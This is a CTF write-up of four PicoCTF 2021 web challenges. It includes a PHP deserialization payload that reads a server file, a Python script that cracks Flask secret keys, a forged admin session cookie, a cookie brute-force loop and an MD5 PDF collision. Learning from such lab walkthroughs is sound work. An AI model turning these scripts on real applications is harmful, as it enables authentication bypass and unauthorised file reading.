PicoCTF 2021 - Web Challenge Writeups

With PicoCTF 2021 officially over, I thought I'd take the time to write up a couple of the web challenges I completed. Nothing too complex here: some basic cookie manipulation, MD5 collisions, a PHP de-serialization vulnerability and a forged Flask session cookie. It was great to put some of what I've been learning on the PortSwigger Web Security Academy to good use!

Completed Challenges

- Cookies - Basic Cookie Brute Force

- Super Serial - PHP De-serialization Attack

- It's my Birthday - PDF MD5 Collision Vulnerability

- Most Cookies - Flask Cookie Vulnerability

Let's get to it.

Cookies

As the name suggests, this challenge involves simple manipulation of cookies. The landing page shows a search box where you type in a cookie name, and the site checks which type of cookie you gave it.



If we capture the request in Burp when we search for the "snickerdoodle" cookie, we can see a value of -1 being assigned to name in the Cookie header.





Changing this value returns different responses, so I sent the request to Burp Intruder to brute force it, adding a payload position on the value of the name cookie.

The payload type was set to Numbers, running from 0 to 100 in steps of one.



In the Options tab, I added a Grep - Match rule for the string picoCTF{, since any response containing it would indicate that a flag had been presented.

Running it finds the success string at the cookie value 18.

Flag: picoCTF{3v3ry1_l0v3s_c00k135_bb3b3535}


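If you don't have Burp Suite, the same Intruder run can be sketched in Python using only the standard library. This is a minimal sketch, not what I actually ran. BASE_URL is a hypothetical placeholder for the challenge instance. I'm also assuming that a plain GET with the name cookie set returns the page that would contain the flag.

```python
import urllib.request
from typing import Callable, Optional

# Hypothetical target: replace with the challenge instance's URL.
BASE_URL = "http://example.com/check"


def fetch_with_cookie(value: int) -> str:
    """GET BASE_URL with the name cookie set to value and return the body."""
    req = urllib.request.Request(BASE_URL, headers={"Cookie": f"name={value}"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def find_flag(fetch: Callable[[int], str], start: int = 0, stop: int = 100,
              marker: str = "picoCTF{") -> Optional[tuple[int, str]]:
    """Try cookie values start..stop inclusive, like Intruder's Numbers payload.

    Returns (value, body) for the first response containing marker, else None.
    """
    for value in range(start, stop + 1):
        body = fetch(value)
        if marker in body:  # same idea as the Grep - Match column
            return value, body
    return None
```

Calling `find_flag(fetch_with_cookie)` walks 0 to 100. Against this challenge it should stop at 18, as Intruder did. Passing the fetch function in as a parameter keeps the search loop separate from the HTTP details.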

Super Serial

Judging from the name, this looked like a basic de-serialization vulnerability. The webpage shows a simple login form.



Running gobuster against the target revealed some other files in the web directory.

The robots.txt file had one entry, /admin.phps, which returned a 404. However, it hinted that we could view the source code of other pages by appending an s to the end of the page name.



After beautifying the code, we can see that de-serialization is happening on a user-controlled variable: the login cookie, which isn't set by default, gets de-serialized by the application.

```php
if (isset($_COOKIE["login"]))
{
    try
    {
        // Attacker-controlled: URL-decoded, base64-decoded, then unserialized
        $perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));
        $g = $perm->is_guest();
        $a = $perm->is_admin();
    }
    catch(Error $e)
    {
        // $perm is concatenated into a string here, so the object gets converted to a string
        die("Deserialization error. " . $perm);
    }
}
?>
```



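Now, looking at the authentication.php source code, we can see a class called access_log, which reads data in from a log file. It is later instantiated with new access_log("access.log"). Suppose we supply our own serialized access_log object with a different file name. Calling is_guest() on it will throw an Error, because access_log has no such method, and the catch block then concatenates $perm into the error message. Converting the object to a string calls access_log's __toString() method, which returns the contents of its log file. So the contents of whichever file we chose should be printed back to us.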

What is this "De-Serialization Vulnerability"?

Vickie Li has done an excellent write-up on exploiting PHP de-serialization here, but I'll summarize it below.

Certain programming languages support "serialization", which converts an object into a format that can be stored or transmitted between a source and a destination, and later turned back into the original object. Take the following code.

```php
<?php
class MyObject {
    public $name;
    public $age;
    public $species;
}

$object = new MyObject;
$object->name = "Toby";
$object->age = 25;
$object->species = "Human";

echo serialize($object);
?>
```



We define a class called MyObject with three properties, create an instance of it and assign values to those properties. At the end, we serialize the complete object, which returns the following output.


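To make the format less opaque, here is a small Python sketch that builds the same string by hand. It only handles public string, integer and boolean properties, which is enough for this example; PHP's real serialize() covers many more types. Strings are written as `s:<byte length>:"<value>";`, integers as `i:<value>;`, and the object wraps its property pairs as `O:<class name length>:"<class name>":<property count>:{...}`.

```python
def php_value(value) -> str:
    """Serialize a bool, int or str the way PHP's serialize() does."""
    if isinstance(value, bool):  # check before int: bool is a subclass of int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # PHP records the length in bytes, not characters
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    raise TypeError(f"unsupported type: {type(value).__name__}")


def php_object(class_name: str, props: dict) -> str:
    """Serialize an object with public properties into PHP's O:... format."""
    body = "".join(php_value(k) + php_value(v) for k, v in props.items())
    return f'O:{len(class_name)}:"{class_name}":{len(props)}:{{{body}}}'


print(php_object("MyObject", {"name": "Toby", "age": 25, "species": "Human"}))
# O:8:"MyObject":3:{s:4:"name";s:4:"Toby";s:3:"age";i:25;s:7:"species";s:5:"Human";}
```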

If we then de-serialize this string, we get all the data back in its original form.

```php
<?php
class MyObject {
    public $name;
    public $age;
    public $species;
}

$object = new MyObject;
$object->name = "Toby";
$object->age = 25;
$object->species = "Human";

$serializedObject = serialize($object);
var_dump(unserialize($serializedObject));
?>
```

The vulnerability arises when a user can control the serialized data before it gets de-serialized, because it lets them sneak in objects the developer never intended. In specific circumstances this can even lead to Remote Code Execution. Here, though, we'll just be using it to change the file that gets displayed.

Exploiting the Vulnerability



So we know there is an access_log class, and that it gets instantiated with the file access.log on the server. Let's recreate this quickly in PHP.

```php
<?php
class access_log {
    public $log_file;
}

$object = new access_log;
// ../flag is the location given in the hint!
$object->log_file = "../flag";

$serializedObject = serialize($object);
echo $serializedObject;
?>
```

This returns the following string.



I'll base64 encode it, and then URL encode it if it contains any = characters. Looking back at the original line that performs the de-serialization, we can see the server reversing exactly these steps:

```php
$perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));
```

We get the following string.

TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9


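The whole pipeline (serialize, base64 encode, URL encode) can also be reproduced in a few lines of Python. This is a sketch that assumes the same access_log class name, log_file property and ../flag path as above. The URL-encoding step is a no-op for this particular payload, because its base64 output happens to contain no =, + or / characters.

```python
import base64
import urllib.parse


def access_log_payload(log_file: str) -> str:
    """Build a login cookie value that unserializes to an access_log object."""
    prop = "log_file"
    serialized = (
        f'O:{len("access_log")}:"access_log":1:'
        f'{{s:{len(prop)}:"{prop}";s:{len(log_file.encode())}:"{log_file}";}}'
    )
    encoded = base64.b64encode(serialized.encode()).decode()
    # Reverse of the server's urldecode(): safe="" also escapes "/", and "+"
    # becomes %2B so it isn't decoded into a space.
    return urllib.parse.quote(encoded, safe="")


print(access_log_payload("../flag"))
```

Printing the result gives the same TzoxMDoi... string as above.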

Let's send a request with Burp Suite, adding a login cookie with this value.



Wahey! And it prints the flag out for us. What a great challenge to learn some of the basics surrounding de-serialization vulnerabilities.

Flag: picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_c5123066}

It's my Birthday



The challenge description suggests that we need to perform an md5 collision attack with 2 PDF files that are different files, but have the same hash.

Going to the webpage and trying to upload two PDFs, I was met with a "File too Large" error message. Strange.

I went ahead and created a blank Word document, exported it twice to PDFs with two different names, and then used an online compression tool to get them under 10kb. Surely this was small enough!

Nice. So the original ~35kb was too large, and 10kb works fine. Now to work out how to get the two files to have the same MD5 hash. Running md5sum on a file gives you the hash of that exact file's contents. Hashes like these are often used to verify downloads: you can check that the file you downloaded is the same one the author originally published, maintaining the integrity of the software.

A collision occurs when two files are fundamentally different but both produce the same hash. MD5 is particularly weak here. Its 128-bit output is small by modern standards, and, more importantly, known cryptanalytic attacks make it practical to generate colliding files on ordinary hardware.





Let's look at a quick example. Running md5sum on our two PDF files returns two different hash values. After all, they are different files, generated at different times, and so have different metadata. This makes complete sense.


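md5sum simply hashes a file's bytes, so the same comparison is easy to script with Python's hashlib. The following is a minimal sketch. The file names you'd pass in, such as `md5sum("export1.pdf")`, are hypothetical placeholders for the two exported PDFs.

```python
import hashlib


def md5sum(path: str, chunk_size: int = 65536) -> str:
    """Return the hex MD5 digest of a file, like the first column of md5sum."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        # Read in chunks so large files don't have to fit in memory
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()
```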

The challenge essentially requires us to upload two PDFs with the same hash that are nonetheless not the same file. A quick bit of googling about PDF MD5 hash collisions led me to this tweet, which points to a script that creates an MD5 collision between two different PDFs. It takes two different PDF files as arguments and generates a copy of each, and the two copies now share the same hash. The complete script is available here. I also had to place pdf1.bin and pdf2.bin in my working directory, as the script makes use of these files when it runs.



I first had to install mutool on my Kali Linux machine with sudo apt-get install mupdf-tools, and create a file called dummy.pdf in my working directory. The complete layout can be seen below.



After all this was in place, I simply ran the tool and passed my two compressed PDFs as arguments.

This returned two files, collision1.pdf and collision2.pdf. Thankfully, they were both still under the required size at 9.2kb, so I was confident they would upload without issue. Checking the md5sum of these two files confirms that they now both return the same value.


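The condition the challenge describes can be checked locally before uploading: the two files' bytes must differ while their MD5 digests match. The sketch below is my reading of the challenge description, not the server's actual code. For collision1.pdf and collision2.pdf it should return True.

```python
import hashlib


def is_md5_collision(path_a: str, path_b: str) -> bool:
    """True if the two files differ in content but share an MD5 digest."""
    with open(path_a, "rb") as fa, open(path_b, "rb") as fb:
        data_a, data_b = fa.read(), fb.read()
    same_hash = hashlib.md5(data_a).digest() == hashlib.md5(data_b).digest()
    return same_hash and data_a != data_b
```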

Uploading them to the server takes us to a page with the source code, and printed about halfway down is the flag!

Flag: picoCTF{c0ngr4ts_u_r_1nv1t3d_3d3e4c57}



Most Cookies

The Most Cookies challenge hinted that it would be about insecurities in Flask session cookies. We are given the source code for the server and the address it's hosted at.



Navigating to the website, we once again see a prompt asking for a cookie.



If we examine our storage using the developer tools, we can identify our session cookie has been set to eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YFpzGg.TFEbUpCH-7QYcLPhLf-UeeWwYM0.

"Secure" Cookie Format

Flask session cookies are made up of three parts, separated by periods.

eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9 is the session data: a dictionary serialized as JSON and then URL-safe base64 encoded. In our case, it decodes to {"very_auth":"blank"}.

YFpzGg is the timestamp of when the cookie was signed, stored as a big-endian integer and base64 encoded. Current versions of itsdangerous (the library Flask uses to sign cookies) store a standard Unix timestamp, i.e. the number of seconds passed since January 1st, 1970; older versions counted from a custom epoch instead.

TFEbUpCH-7QYcLPhLf-UeeWwYM0 is a signature: an HMAC (SHA-1 by default) computed over the data and the timestamp, using a key derived from the application's secret key. This key needs to stay secret, hence the name. Otherwise, a malicious threat actor could simply create their own Flask cookie and have it accepted by the server, as we're about to see!
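Because the cookie is signed rather than encrypted, the first two parts can be read without knowing the key. This stdlib-only sketch assumes Flask's default format: URL-safe base64 with the = padding stripped, and a leading . meaning the payload is zlib-compressed.

```python
import base64
import json
import zlib


def b64url_decode(data: str) -> bytes:
    """Decode URL-safe base64 whose '=' padding has been stripped."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def decode_flask_cookie(cookie: str) -> tuple[dict, int]:
    """Return (session data, Unix timestamp) from a Flask session cookie.

    The signature is NOT checked, so this says nothing about authenticity.
    """
    compressed = cookie.startswith(".")  # a leading "." marks zlib compression
    payload, timestamp, _signature = cookie.lstrip(".").split(".")
    raw = b64url_decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    # Plain string values decode directly; Flask's tagged types (bytes,
    # tuples, ...) would appear here in their tagged JSON form.
    session = json.loads(raw)
    ts = int.from_bytes(b64url_decode(timestamp), "big")
    return session, ts


data, ts = decode_flask_cookie(
    "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YFpzGg.TFEbUpCH-7QYcLPhLf-UeeWwYM0"
)
print(data, ts)  # {'very_auth': 'blank'} 1616540442
```

The timestamp 1616540442 works out to late on 23 March 2021 (UTC), during the competition.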

Examining the Source Code

There were a few key aspects I was interested in when looking at the source code, after reading about how Flask cookies could potentially be abused.

- Step One: See if we've been given a key.

The first part of the code defines a list of cookie names, and the secret_key is set by choosing a random value from this list. So we know the signing key must be one of these 28 names.

```python
from flask import Flask, render_template, request, url_for, redirect, make_response, flash, session
import random

app = Flask(__name__)
flag_value = open("./flag").read().rstrip()
title = "Most Cookies"

cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread",
                "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter",
                "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon",
                "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron",
                "black and white", "white chocolate macadamia"]  #List of values

app.secret_key = random.choice(cookie_names)  #Select a random value and assign to the secret key variable
```

- Step Two: See what checks need to be passed for the flag to be printed.

Next, I wanted to see what was needed to get the flag printed to our screen. The code snippet below from the flag() function shows that it reads the very_auth key from the session cookie and checks whether its value is equal to admin.

```python
@app.route("/display", methods=["GET"])
def flag():
    if session.get("very_auth"):
        check = session["very_auth"]
        if check == "admin":
            resp = make_response(render_template("flag.html", value=flag_value, title=title))
            return resp
        flash("That is a cookie! Not very special though...", "success")
        return render_template("not-flag.html", title=title, cookie_name=session["very_auth"])
```

We know our original cookie was set to {'very_auth':'blank'}, so we'll have to modify this part too. Note also that this function handles the /display route, so when testing we need to request that page rather than the standard welcome one.

Cracking the Secret Key



So we have a signed cookie and a list of possible secret keys, one of which was chosen when the server started. There's a really neat tool from Paradoxis called Flask-Unsign that can brute force the secret key used to sign a Flask session cookie. This seems reasonable, given we already know there are only 28 candidates. I put the list of names in a file and used some sed magic to turn it into a word-list structure.



I then followed the install instructions and ran the following command to crack the cookie's secret key.

```shell
flask-unsign --unsign --wordlist names --cookie 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YFpzGg.TFEbUpCH-7QYcLPhLf-UeeWwYM0'
```

It successfully cracked with the secret key of tassie!
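Flask-Unsign did the heavy lifting, but the check it performs is small enough to sketch with the standard library. This is not Flask-Unsign's code. It re-implements what I understand to be Flask's default signing scheme: itsdangerous with the salt "cookie-session", HMAC key derivation and SHA-1. Apps that change those settings would need different constants.

```python
import base64
import hashlib
import hmac
from typing import Iterable, Optional

# Assumed Flask defaults (SecureCookieSessionInterface): salt "cookie-session",
# HMAC key derivation, SHA-1 digest.
SALT = b"cookie-session"


def b64url_encode(data: bytes) -> bytes:
    """URL-safe base64 without '=' padding, as itsdangerous writes it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def signature_for(signed_part: bytes, secret_key: str) -> bytes:
    """Signature over b'payload.timestamp' under the given secret key."""
    # Step 1: derive the signing key as HMAC-SHA1(secret_key, salt).
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    # Step 2: HMAC-SHA1 of the signed part, keyed with the derived key.
    return b64url_encode(hmac.new(derived, signed_part, hashlib.sha1).digest())


def is_valid(cookie: str, secret_key: str) -> bool:
    """True if the cookie's signature matches this key (expiry is not checked)."""
    signed_part, _, sig = cookie.encode().rpartition(b".")
    return hmac.compare_digest(signature_for(signed_part, secret_key), sig)


def crack(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate key that validates the cookie, else None."""
    for key in candidates:
        if is_valid(cookie, key):
            return key
    return None


COOKIE_NAMES = [
    "snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap",
    "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss",
    "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint",
    "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox",
    "gingerbread", "tassie", "lebkuchen", "macaron", "black and white",
    "white chocolate macadamia",
]

COOKIE = "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YFpzGg.TFEbUpCH-7QYcLPhLf-UeeWwYM0"
print(crack(COOKIE, COOKIE_NAMES))
```

Run against the cookie from earlier, this should print tassie, matching Flask-Unsign's result. A plain loop is fine here because there are only 28 candidates.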

Forging a Cookie



Now all that was left to do was create a valid cookie of {'very_auth':'admin'}, sign it with tassie, and present it on the /display page, which in theory would show the flag. I started with this gist and adapted the code so it would provide what I needed.

```python
#!/usr/bin/env python
from flask.sessions import SecureCookieSessionInterface
from itsdangerous import URLSafeTimedSerializer


class SimpleSecureCookieSessionInterface(SecureCookieSessionInterface):
    # Build the same signing serializer Flask uses, but from a bare secret
    # key instead of an app object.
    def get_signing_serializer(self, secret_key):
        if not secret_key:
            return None
        signer_kwargs = dict(
            key_derivation=self.key_derivation,
            digest_method=self.digest_method
        )
        return URLSafeTimedSerializer(secret_key, salt=self.salt,
                                      serializer=self.serializer,
                                      signer_kwargs=signer_kwargs)


def encodeFlaskCookie(secret_key, cookieDict):
    sscsi = SimpleSecureCookieSessionInterface()
    signingSerializer = sscsi.get_signing_serializer(secret_key)
    return signingSerializer.dumps(cookieDict)


if __name__ == '__main__':
    secret_key = "tassie"
    sessionDict = {"very_auth": "admin"}
    cookie = encodeFlaskCookie(secret_key, sessionDict)
    print(f"[*] Signed 'very_auth':'admin' session with: {secret_key}\n" + cookie)
```



Running the code above gives a cookie value that looks pretty damn good.

eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFp6CQ.n_jsmBvnt066hkADVLKUDFL4j90

I navigated to the /display page, opened the developer tools to replace the cookie value, and voilà, the flag was printed as expected!

Flag: picoCTF{pwn_4ll_th3_cook1E5_25bdb6f6}

Finishing Up

That's just about it from me for the web challenges. I solved a few more, but I don't have notes on everything I did, so I may write them up at a later date, since PicoCTF leaves its challenges up all year. Thanks again to the organizers for a great experience, much appreciated.